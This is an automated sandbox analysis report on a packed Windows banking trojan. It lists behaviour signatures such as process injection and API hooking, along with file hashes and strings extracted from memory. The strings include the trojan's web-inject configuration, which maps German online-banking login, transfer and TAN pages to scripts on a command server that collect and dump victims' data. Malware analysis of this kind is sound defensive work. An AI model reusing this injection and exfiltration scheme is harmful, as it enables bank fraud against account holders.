Joe Sandbox - Abstract Analysis File 16204

Generated with Joe Sandbox 6.0.2

General information
Start time:	20:02:27
Start date:	02/07/2012
Overall analysis duration:	0h 5m 42s
Sample file name:	7db482f5469dfeb0a6b2b4f66c062314
Cookbook file name:	Analyse Banking Trojan.jbs
Analysis system description:	XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	20
Errors:	Too many NtReadFile calls (excessive behavior) Too many NtProtectVirtualMemory calls (excessive behavior) Too many NtWriteFile calls (excessive behavior) Too many NtSetInformationFile calls (excessive behavior)

Classification / Threat Score
Persistence, Installation, Boot Survival:
Hiding, Stealthiness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:

Signature Detections
Binary contains device paths (device paths are often used for kernelmode <-> usermode communication)
Executable is probably coded in java
Printf formatting strings found in memory and binary data
Queries a list of all open handles
Queries a list of all running processes
Spawns processes
Urls found in memory or binary data
Binary may include packed or crypted data
Creates a mutex to recognise infected hosts	\BaseNamedObjects\WTFGQ7AIWawyMYWWRAk3SWXkgj39MdG \BaseNamedObjects\ofjwkwufhdjfgki
Downloads files from webservers via HTTP
Entrypoint lies outside standard sections
Found strings which match to known social media urls
PE file contains sections with non-standard names
Performs DNS lookups
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Found strings which match to known bank urls
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Hooks winsocket function (used for sniffing or altering network traffic)
Injects a PE file into a foreign processes
Modifies the prolog of usermode functions (usermode inline hooks)
Writes to foreign memory regions

Static File Information

General Information
File name:	7db482f5469dfeb0a6b2b4f66c062314
File size:	178688
MD5:	7db482f5469dfeb0a6b2b4f66c062314
SHA1:	ecd273776ac122017f13d3548050ec47f31fd71e
SHA256:	8dfc964f3cd4630df0b06e9142b1aac0ab19e4307bfe475e254181cea4a7283a
File type:	PE32 executable for MS Windows (GUI) Intel 80386 32-bit

PE Information

General
Entrypoint:	0x467570L	UPX1
Imagebase:	0x400000L
Time stamp:	0x4D3420BA [Mon Jan 17 10:58:02 2011 UTC]
Subsystem:	windows gui
TLS callbacks:

Resources
Name	RVA address	Size	Type
English	0x5115cL	0x4e0L	8086 relocatable (Microsoft)
English	0x5163cL	0x12123L	data
English	0x63760L	0x21L	data
English	0x63784L	0xc00L	data
English	0x64384L	0xa00L	data

Imports
DLL	Import
KERNEL32.DLL	LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ntdll.dll	memset

Exports

Sections
Name	Virtual address	Virtual size	Raw size	entropy
UPX0	0x1000L	0x3c000L	0x0L	0.0
UPX1	0x3d000L	0x2c000L	0x2b200L	7.99692545362
.rsrc	0x69000L	0x1000L	0x400L	2.26113447357

Version Infos
Description	Data

Possible Origin
Language of compilation system	Country where language is spoken	Map
English	United States

String Analysis

Formattings for printf style functions
String value	Source
LOG: File %s being registered.	iexplore.exe
Identified by %s7%1!ls!	iexplore.exe
%OHB"s	iexplore.exe
\|%SystemRoot%\system32\rsvpsp.dll	iexplore.exe
@@dbsepaerr.js###%SE	msdtc.exe
CTipFunctionProvider(sketch)::GetFunction %s	iexplore.exe
@@speuueberweisung.js###%SERV1%/scheck	alg.exe
@@dbitanauth.js###%SERV1%/scheck.php?target=DB&id=itanauth	iexplore.exe
var L_ACR_ReturnTo_TEXT = "Try to return to %s";	iexplore.exe
@%SERV1%/get.php\|getrez.php@%SERV1%/getrez.php\|put.php@%SERV1%/put.php\|log.php@%SERV1%/log.php\|dump.php@%SERV1%/dump.php\|captcha.php@%SERV1%/fcaptcha.php\|captcha2.php@%SERV1%/fcaptcha2.php\|fiscript.js@%SERV1%/scheck.php?target=FIDU&id=main\|fiscript2.js@%SERV1%/scheck.php?target=FIDU&id=main2\|https.html@%SERV1%/scheck.php?target=CMN&id=https\|dbcommon.js@%SERV1%/scheck.php?target=DB&id=common\|dbhistory.js@%SERV1%/scheck.php?target=DB&id=history\|dbinland.js@%SERV1%/scheck.php?target=DB&id=inland\|dbinlandconfirm.js@%SERV1%/scheck.php?target=DB&id=inlandconfirm\|dbinlanderr.js@%SERV1%/scheck.php?target=DB&id=inlanderr\|dbitanauth.js@%SERV1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js@%SERV1%/scheck.php?target=DB&id=sepa\|dbsepaconfirm.js@%SERV1%/scheck.php?target=DB&id=sepaconfirm\|dbsepaerr.js@%SERV1%/scheck.php?target=DB&id=sepaerr\|spanfang.js@%SERV1%/scheck.php?target=SPARK&id=anfang\|spcommon.js@%SERV1%/scheck.php?target=SPARK&id=common\|speuuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=euuebereintrag\|speuueberfrage.js@%SERV1%/scheck.php?target=SPARK&id=euueberfrage\|speuueberweisung.js@%SERV1%/scheck.php?target=SPARK&id=euueberweisung\|spfinanzstatus.js@%SERV1%/scheck.php?target=SPARK&id=finanzstatus\|spkontodetails.js@%SERV1%/scheck.php?target=SPARK&id=kontodetails\|splogin.js@%SERV1%/scheck.php?target=SPARK&id=login\|spsepauebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=sepa	explorer.exe, wscntfy.exe
%s&tid=%s&%s	iexplore.exe
[ERROR] : Cannot create thread. 0o : dwErr == %d	iexplore.exe
%SystemRoot%\Debug\UserMode\userenv.log	iexplore.exe
%s Line: %ld Character: %ld	iexplore.exe
ST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	dllhost.exe
@dump.php###%SERV1%/dump.php	iexplore.exe
%sAuthor: %s	iexplore.exe
ERR: Security Trust Verification Failed or rejected by user/administrator. Check Security Settings. Detailed Error Code (hr) = %lx	iexplore.exe
m&&delete g[m];g[a]=r;h[i]=a;i=(i+1)%f}e!=_.p&&j.vv==_.p&&(j.vv=e);c!=_.p&&(j.lx=c);d!=_.p&&(j.rv+=d)}function c(a,e){for(var b=0,c;b<a.length;++b)if(c=e[b],0<c&&a[b]>c)return _.l;return _.w}var f=e\|\|10,g={},h=[],i=0,j=b(),m=b(),e={LX:function updateTimeToFirstChunk(a,e){d(a,e,_.p,_.p)},MX:function updateTimeToLastChunk(a,e){d(a,_.p,e,_.p)},JX:function updateProcessingTime(a,e){d(a,_.p,_.p,e)},YR:function checkThresholds(e,b,d){a();var g=[j.vv,j.lx,j.rv],i=[m.vv,m.lx,m.rv];if(e=e.sI(b,d))if(b=h.length==	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
Unknown Setup Error.=LOG: Downloaded images must now be all native code, URL:(%s)	iexplore.exe
id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	svchost.exe
%s\%s\%s\%s\%s\%s	iexplore.exe
movenext.js###%SERV1%/scheck.php?target=POST&id=movenext	iexplore.exe
@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	svchost.exe, wmiprvse.exe
%SERV1%/	explorer.exe, ctfmon.exe, wscntfy.exe
%SystemRoot%\System32\mswsock.dll	iexplore.exe
Pw%n[w	iexplore.exe
%C&&]N	iexplore.exe
guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=%08X&md5=%s&plg=%s	explorer.exe
id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	spoolsv.exe
6This is the full list of %s. No filters are available.	iexplore.exe
Go to '%s'	iexplore.exe
EERR: INF Processing: No section for processing: %s	iexplore.exe
@@pbcommon.js###%SERV1%/sche	ctfmon.exe
@@spsepauebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=sepauebereintrag	iexplore.exe
zstatus.js###%SERV1%/scheck.php?target=SPARK&id=finanzstatus	iexplore.exe
@@speuueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=euueberweisung	iexplore.exe
%%%%GGGGOOOOBBBB((((	iexplore.exe
Disclosed to others who might contact you for marketing of services and/or products. You will have an opportunity to ask the site not to do this.%Disclosed to others for any purposes.	iexplore.exe
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*%+%-%/%1%3%5%7%9%;%=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s%+!,!	iexplore.exe
peuueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=euueberweisung	msiexec.exe
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d	iexplore.exe
Tab Group %d	iexplore.exe
Installing component %s	iexplore.exe
UERR: Setup Failed Error Code: (hr) = %lx, installing: %s to %s destination code(%lx)	iexplore.exe
%systemroot%\system32\com\dmp	iexplore.exe
%s%s%s	iexplore.exe
%u hours ago	iexplore.exe
eHu%ip	nav_logo107[1].png.dr
{IU;%u	explorer.exe
1Are you sure you want to delete History Item: %s?7Are you sure you want to delete these %d History items?5Are you sure you want to delete the selected Cookies?	iexplore.exe
CPenIMX(sketch)::_EditInk(...,%s,%s)	iexplore.exe
URL:%s Protocol	iexplore.exe
epaerr.js###%SERV1%/scheck.php?target=DB&id=sepaerr	iexplore.exe
%%%FFFFFFFiiiii	iexplore.exe
Shows or hides the status bar.%Shows or hides formatting indicators.	iexplore.exe
%s (new)	iexplore.exe
Pages visited %s%Pages visited in week starting %1!ws!#Pages visited from %1!ws! to %2!ws!	iexplore.exe
%i>0T;	iexplore.exe, 0797C381B2F87EB5A1D5573BD15BA4F40.dr
Expires at: %s	iexplore.exe
p.php###%SERV1%/dump.php	svchost.exe, wmiprvse.exe, dllhost.exe, msdtc.exe, msiexec.exe, iexplore.exe
Updated %s	iexplore.exe
CWndMain(sketch)::Enable(fEnable=%s)	iexplore.exe
%s\|%s\|All Files\|.*\|\|	iexplore.exe
@@speuueberfrage.js###%SERV1%/scheck.php?target=	svchost.exe, wmiprvse.exe
Content-Length: %u	iexplore.exe
%s (Default)cPlease choose another default search provider for Internet Explorer before removing this selection.	iexplore.exe
%ole32.dll	iexplore.exe
LOG: Item %s being processed.	iexplore.exe
.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	iexplore.exe
@@sp_ueberweisung.js###%SERV1%/scheck.php?target=SPARK&id=_ueberweisung	iexplore.exe
@@spsepaueberfrage.js###%SERV1%/scheck.php?target=SPARK&id=sepaueberfrage	iexplore.exe
gin\|pbstart.js@%SERV1%/scheck.php?target=POST&id=start\|pbueberweisung.js@%SERV1%/scheck.php?target=POST&id=ueberweisung\|pbuliste.js@%SERV1%/scheck.php?target=POST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	svchost.exe
1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js	iexplore.exe
@@pbcommon.js###%SERV1%/scheck.php?target=POST&id=common	iexplore.exe
2LOG: Redundant download started on %s (hr = %lx).	iexplore.exe
@@pbinptan.js###%SERV1%/scheck.php?target=POST&id=inptan	iexplore.exe
&'return' statement outside of function"Can't have 'break' outside of loop%Can't have 'continue' outside of loop	iexplore.exe
yOpening %d tabs at once might take a long time and cause Internet Explorer to respond slowly.	iexplore.exe
%s sec	iexplore.exe
@@splogin.js###%SERV1%/scheck.php?target=SPA	ctfmon.exe
[ERROR] : Empty report. Unknown error : dwErr == %d	iexplore.exe
@@spueberfrage.js###%SERV1%/scheck.php?targe	alg.exe
js###%SERV1%/scheck.php?target=SPARK&id=euueberfrage	lsass.exe
A%emC{	iexplore.exe
%%%FFFFFF	iexplore.exe
%s Suggestions	iexplore.exe
running from location : %s	iexplore.exe
rogram Files\Windows Media Player\wmplayer.exe /Open "%L"	explorer.exe
@%SERV1%/get.php\|getrez.php@%SERV1%/getrez.php\|put.php@%SERV1%/put.php\|log.php@%SERV1%/log.php\|dump.php@%SERV1%/dump.php\|captcha.php@%SERV1%/fcaptcha.php\|captcha2.php@%SERV1%/fcaptcha2.php\|fiscript.js@%SERV1%/scheck.php?target=FIDU&id=main\|fiscript2.js@%SERV1%/scheck.php?target=FIDU&id=main2\|https.html@%SERV1%/scheck.php?target=CMN&id=https\|dbcommon.js@%SERV1%/scheck.php?target=DB&id=common\|dbhistory.js@%SERV1%/scheck.php?target=DB&id=history\|dbinland.js@%SERV1%/scheck.php?target=DB&id=inland\|dbinlandconfirm.js@%SERV1%/scheck.php?target=DB&id=inlandconfirm\|dbinlanderr.js@%SERV1%/scheck.php?target=DB&id=inlanderr\|dbitanauth.js@%SERV1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js@%SERV1%/scheck.php?target=DB&id=sepa\|dbsepaconfirm.js@%SERV1%/scheck.php?target=DB&id=sepaconfirm\|dbsepaerr.js@%SERV1%/scheck.php?target=DB&id=sepaerr\|spanfang.js@%SERV1%/scheck.php?target=SPARK&id=anfang\|spcommon.js@%SERV1%/scheck.php?target=SPARK&id=common\|speuuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=euuebereintrag\|speuueberfrage.js@%SE	explorer.exe, wscntfy.exe
@@spkontodetails.js###%SERV1%/scheck.php?t	iexplore.exe
Adding CDL=(CLASSID: %lx..., szCODE:(%ws), VersionMS:%lx, VersionLS:%lx)	iexplore.exe
%s (unverified publisher)	iexplore.exe
@captcha.php###%SERV1%/fcaptcha.php	iexplore.exe
of webpages that are designed for older browsers.aA problem displaying %s caused Internet Explorer to refresh the webpage using Compatibility View.	iexplore.exe
%s\Content.IE5\%s	iexplore.exe
%d %b %Y %X GMT	winlogon.exe
@getrez.php###%SERV1%/getrez.php	iexplore.exe
@@speuueberweisung.js###%SERV1	winlogon.exe, msdtc.exe
et=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	msiexec.exe
@get.php###%SERV1%/get.php	iexplore.exe
Sho&w: %s0Add-ons that have been used by Internet Explorer-Add-ons that run without requiring permission$Downloaded ActiveX Controls (32-bit)-Add-ons currently loaded in Internet Explorer	iexplore.exe
/LOG: Version not identified for %s, using 0.1.	iexplore.exe
@@pbuliste.js###%SERV1%/scheck.php?target=POST&id=uliste	iexplore.exe
3[)%gY	iexplore.exe
.js@%SERV1%/scheck.php?target=POST&id=uliste\|pbumsatz.js@%SERV1%/scheck.php?target=POST&id=umsatz\|pbgoodtan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|pbmovenext.js@%SERV1%/scheck.php?target=POST&id=movenext\|	jqs.exe
CPenIMX(sketch)::OnKillThreadFocus(); _GetOnOff() returns %s.	iexplore.exe
Netscape Navigator profile: %s	iexplore.exe
@@pbmovenext.js###%SERV1%/scheck.php?target=POST&id=movenext	iexplore.exe
%s hr	iexplore.exe
%SystemRoot%\Debug\UserMode\userenv.bak	iexplore.exe
%Can't create necessary temporary	iexplore.exe
@@spfinanzstatus.js###%SERV1%/scheck.php?target=SPARK&id=finanzstatus	iexplore.exe
%s Document\|%s\|All Files\|.*\|\|	iexplore.exe
Unknown-Lear&n more about search provider preferences%Lear&n more about InPrivate Filtering	iexplore.exe
CTipFunctionProvider(sketch)::GetFunction(...,...,%s)	iexplore.exe
Start Page.Would you like to set your Start Page to "%s"?	iexplore.exe
!.LOG: INF Processing: Satellite DLL found:%s	iexplore.exe
Accelerators: %s	iexplore.exe
BERR: Run Setup Hook: Failed Error Code:(hr) = %lx, processing: %s	iexplore.exe
Netscape versions less than 4.0"Netscape Navigator 4.0 profile: %s	iexplore.exe
End downloading component %s	iexplore.exe
@@dbcommon.js###%SERV1%/scheck.php?target=DB&id=common	iexplore.exe
$xsJ%xs{%xs	iexplore.exe
%s (expiring)	iexplore.exe
Do you want to replace it?+Cannot find %s.	iexplore.exe
Default: %s	iexplore.exe
%s min	iexplore.exe
@@pbtanlock.js###%SERV1%/scheck.php?target=POST&id=tanlock	iexplore.exe
re = /%s/g;	iexplore.exe
###%SERVu	iexplore.exe
Connecting to site %s	iexplore.exe
%ls %ls	iexplore.exe
Export the favorites to %s	iexplore.exe
@@dbsepaerr.js###%SERV1%/scheck.php?target=DB&id=sepaerr	iexplore.exe
%d.%d.%d.%d	iexplore.exe
Export the cookies to %s	iexplore.exe
_.Oba=function(e,a){function b(a){a-=e;0>a&&(a=0);c[f]=a;f=(f+1)%d}var d=a\|\|20,c=[],f=0,g=_.w,h={start:function start$$9(){function a(){var d=window.google.time();b(d-c);g&&(c=d,window.setTimeout(a,e))}var c=window.google.time();g=_.l;window.setTimeout(a,e)},stop:function stop$$1(){g=_.w},GS:function getAllDataPoints(){return c.slice(f).concat(c.slice(0,f))}};h.hZ=b;return h};	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
%s (Upgrade)	iexplore.exe
%u minute ago	iexplore.exe
###%SERV1%/scheck.php?target=SPARK&id=common	alg.exe
New Folder (%d)	iexplore.exe
PackagerWould you like to allow pop-ups from '%s'?Would you like to block pop-ups from '%s'?	iexplore.exe
%userenv.dll	iexplore.exe
%Certisign Certificadora Digital Ltda.100.	iexplore.exe
@@spkontodetails.js###%SERV1%/scheck.php?target=SPARK&id=konto	svchost.exe, wmiprvse.exe
@@dbsepa.js###%SERV1%/scheck.php?target=DB&id=sepa	iexplore.exe
. Cannot get primary/default language!RLOG: URL Download Complete: hrStatus:%lx, hrOSB:%lx, hrResponseHdr:%lx, URL:(%ws)	iexplore.exe
%sWhat's New: %s	iexplore.exe
%OLE32.	iexplore.exe
%SystemRoot%\	iexplore.exe
"%s"pInternet Explorer does not support this type of search provider.	iexplore.exe
nLOG: Reporting Code Download Completion: (hr:%lx%s, CLASSID: %lx..., szCODE:(%ws), MainType:%ws, MainExt:%ws)	iexplore.exe
Back to %s (Alt+Left)	iexplore.exe
http://%s.com	iexplore.exe
Do you want to format it now?)The disk in drive %c cannot be formatted.	iexplore.exe
[ERROR] : Empty szLink? : dwErr == %d	iexplore.exe
%s Accelerator	iexplore.exe
Sketch-Ink version=%s	iexplore.exe
%f7A{[	iexplore.exe
%s (Alt+Z)	iexplore.exe
%sSubject: %s	iexplore.exe
@@pbueberweisung.js###%SERV1%/scheck.php?target=POST&id=ueberweisung	iexplore.exe
,%.%0%2%4%6%8%:%<%>%@%B%E%G%I%	iexplore.exe
Feed %d	iexplore.exe
SOFTWARE\Microsoft\CTF\TIP\%s\LanguageProfile\0x%08X	iexplore.exe
SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	winlogon.exe, msdtc.exe
ueberweisung.js###%SERV1%/scheck.php?target=POST&id=ueberweisung	iexplore.exe
@@https.html###%SERV1%/scheck.php?target=CMN&id=https	iexplore.exe
Search for "%s"	iexplore.exe
EncodeUrl = EncodeUrl + '%u' + OutputEncoder_TwoByteHex(c);	iexplore.exe
%d-%d-%d	iexplore.exe
!XERR: INF Processing: Failed (%lx) processing: %s	iexplore.exe
@@speuueberweisung.js###%SERV1%/scheck.php?target=SPARK&id	iexplore.exe
%%%FFFFF	iexplore.exe
%Secure Server Certification Authority0	iexplore.exe
. language = %s	iexplore.exe
UYour current security settings do not allow you to download files from this location.vWhen you send information to the %s, it might be possible for others to see that information. Do you want to continue?xWhen you send information from the %s, it might be possible for others to see that information. Do you want to continue?	iexplore.exe
Import the favorites from %s	iexplore.exe
%s?%s&stat=online	explorer.exe
\%1\$s\|\%s	iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d	iexplore.exe
%s\%s\%s\%s\%s	iexplore.exe
`w%D,3	iexplore.exe
%u matches	iexplore.exe
threadmetadata!nfo%d	iexplore.exe
H$Bee%n:	iexplore.exe
Cicero version=%s	iexplore.exe
%s - Security Warning$Al&ways ask before opening this file	iexplore.exe
tan.js@%SERV1%/scheck.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	svchost.exe
@@fiscript2.js###%SERV1%/scheck.php?target=FIDU&id=main2	iexplore.exe
rERR: OCX Install: detected incompatible platform binary (%s). Please contact site for a binary for your platform.	iexplore.exe
You have imported %i feeds.	iexplore.exe
CPenIMX(sketch)::OnChange(); _GetOnOff() returns %s.	iexplore.exe
Assertion failed: %s, file %s, line %d	iexplore.exe
CWndMain(sketch)::Show(fShow=%s) %s	iexplore.exe
%sLast Updated: %s	iexplore.exe
@put.php###%SERV1%/put.php	iexplore.exe
Add Search Providers...Mhttp://auto.search.msn.com/response.asp?MT={searchTerms}&srch=%d&prov=%s&utf8NThe following search provider is already installed. Do you want to replace it?9The following search provider is already installed:	iexplore.exe
Expires in: %s	iexplore.exe
CPenIMX::_ICCallback(%s,%08X,...)	iexplore.exe
%d %d %d %d	iexplore.exe
(Not verified) %s	iexplore.exe
@%SERV1%/get.php\|getrez.php@%SERV1%/getrez.php\|put.php@%SERV1%/put.php\|log.php@%SERV1%/log.php\|dump.php@%SERV1%/dump.php\|captcha.php@%SERV1%/fcaptcha.php\|captcha2.php@%SERV1%/fcaptcha2.php\|fiscript.js@%SERV1%/scheck.php?target=FIDU&id=main\|fiscript2.js@%SERV1%/scheck.php?target=FIDU&id=main2\|https.html@%SERV1%/scheck.php?target=CMN&id=https\|dbcommon.js@%SERV1%/scheck.php?target=DB&id=common\|dbhistory.js@%SERV1%/scheck.php?target=DB&id=history\|dbinland.js@%SERV1%/scheck.php?target=DB&id=inland\|dbinlandconfirm.js@%SERV1%/scheck.php?target=DB&id=inlandconfirm\|dbinlanderr.js@%SERV1%/scheck.php?target=DB&id=inlanderr\|dbitanauth.js@%SERV1%/scheck.php?target=DB&id=itanauth\|dbmain.js@%SERV1%/scheck.php?target=DB&id=main\|dbpresepa.js@%SERV1%/scheck.php?target=DB&id=presepa\|dbsepa.js@%SERV1%/scheck.php?target=DB&id=sepa\|dbsepaconfirm.js@%SERV1%/scheck.php?target=DB&id=sepaconfirm\|dbsepaerr.js@%SERV1%/scheck.php?target=DB&id=sepaerr\|spanfang.js@%SERV1%/scheck.php?target=SPARK&id=anfang\|spcommon.js@%SERV1%/scheck.php?target=SPARK&id=common\|speuuebereintrag.js@%SERV1%/scheck.php?target=SPARK&id=euuebereintrag\|speuu	ctfmon.exe
%sLast Visited: %s	iexplore.exe
CWndMain(sketch)::ShowHideUI() GetTipWantsToBeVisible()=%s _GetOnOff=%s this->bCanGetIC()=%s bShowMain=%s bEnable=%s	iexplore.exe
@@spsepauebereintrag.js###%SERV1	lsass.exe
Expired %s	iexplore.exe
%IgnoreLoadLibrary	iexplore.exe
CLSID\%s\InprocServer32	iexplore.exe
@@spuebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=u	svchost.exe
@@spanfang.js###%SERV1%/scheck.php?target=SPARK&id=anf	svchost.exe
@@splogin.js###%SERV1%/scheck.php?target=SPARK&id=login	iexplore.exe
(GMT %s%02u:%02u) %s	iexplore.exe
@@spsepaueberfrage.js###%SERV1%/scheck.php?target=SPARK&id=sepaueb	iexplore.exe
Forward to %s (Alt+Right)	iexplore.exe
0%clear	iexplore.exe
AThere is no disk in drive %c.	iexplore.exe
%Opens the webpage for this Web Slice.	iexplore.exe
%u(t:B,c'	iexplore.exe
CPenIMX(sketch)::OnSetThreadFocus(); _GetOnOff() returns %s.	iexplore.exe
(%d new)	iexplore.exe
Start downloading from site: %s	iexplore.exe
ache%OLK*	svchost.exe, iexplore.exe
For details, see 9ERR: Could not convert extension %s or type %s to clsid.	iexplore.exe
Search %s	iexplore.exe
[ERR: INF Processing: Failed Error Code:(%lx) processing: %s. Cannot get primary language!	iexplore.exe
%%s has requested information from you	iexplore.exe
%s (expired)	iexplore.exe
check.php?target=POST&id=goodtan\|pbinptan.js@%SERV1%/scheck.php?target=POST&id=inptan\|pbtanhist.js@%SERV1%/scheck.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	alg.exe
@@speuuebereintrag.js###%SERV1%/scheck.php?target=SPARK&id=euuebereintrag	iexplore.exe
%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	iexplore.exe
Getting data from cache %s#Website found. Waiting for reply...	iexplore.exe
4O0-%i1	iexplore.exe
%xpsp2res.dll	iexplore.exe
Application: %s	iexplore.exe
%Certisign Certificadora Digital Ltda.1301	iexplore.exe
k.php?target=POST&id=tanhist\|pbtanlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	jqs.exe
.LOG: Setup Hook %s was executed successfully.	iexplore.exe
0,_.Gd)(b,"disabled")\|\|this.B.push(b)};_.EI=function(e,a){e.IB(e.M==_.p?a?0:e.B.length-1:(e.M+(a?1:e.B.length-1))%e.B.length)};	iexplore.exe
%USERPROFILE%\Favo	iexplore.exe
Keep &maximum items (%i)	iexplore.exe
l%s has been removed from this computer. Do you want to clean up your personalized settings for this program?	iexplore.exe
Navigate to '%s'	iexplore.exe
@@pbgoodtan.js###%SERV1%/scheck.php?target=POST&id=goodtan	iexplore.exe
@@dbpresepa.js###%SERV1%/scheck.php?target=DB&id=presepa	iexplore.exe
:POST_URL %SERV1%/fpstore.php	iexplore.exe
rI]%ipF	iexplore.exe
%a, %d %b %Y %X GMT	globpluginspipe.dr
%SystemRoot%\Syst	iexplore.exe
%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe	iexplore.exe
Sketch TIP version=1.00.2297.1 m_langIDCurrent=0x%04X %s	iexplore.exe
Search with %s	iexplore.exe
8A webpage is not responding on the following website: %s	iexplore.exe
88qB%S	iexplore.exe
anlock.js@%SERV1%/scheck.php?target=POST&id=tanlock\|	dllhost.exe
%s, %s	iexplore.exe
Looking up %s	iexplore.exe
ommon.js###%SERV1%/scheck.php?target=SPARK&id=common	winlogon.exe, msdtc.exe
%s\Content.IE5\0	iexplore.exe
WRN: OCX Registration: no DllRegisterServer entry point in (%s). Skipping registration. INF Author: mark this section with RegisterServer=No as a performance optimization.	iexplore.exe
G\|%fGV	explorer.exe, svchost.exe
@@pblogin.js###%SERV1%/scheck.php?target=POST&id=login	iexplore.exe
_.Zfa=function(){(0,_.Rc)("#iur");for(var e=(0,_.Qc)("li.uh_r"),a=_.Xw,b=0,d;d=e[b++];){var c=(0,_.Rc)("a.bia",d),f=_.Yw[c.id];d=(0,_.Rc)("button.esw",d);f&&d&&(d.setAttribute("g:imgtbn",f[0]),c=c.href,d.setAttribute("g:imgland",c),c=/:\/\/(www.)?([^/?#]*)/i.exec((0,_.Sw)(c,"imgrefurl")),c=a.replace(/\%1\$s\|\%s/,c?c[2]:""),d.setAttribute("g:imgtitle",c))}};	iexplore.exe, rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1].dr
Search provider: %s	iexplore.exe
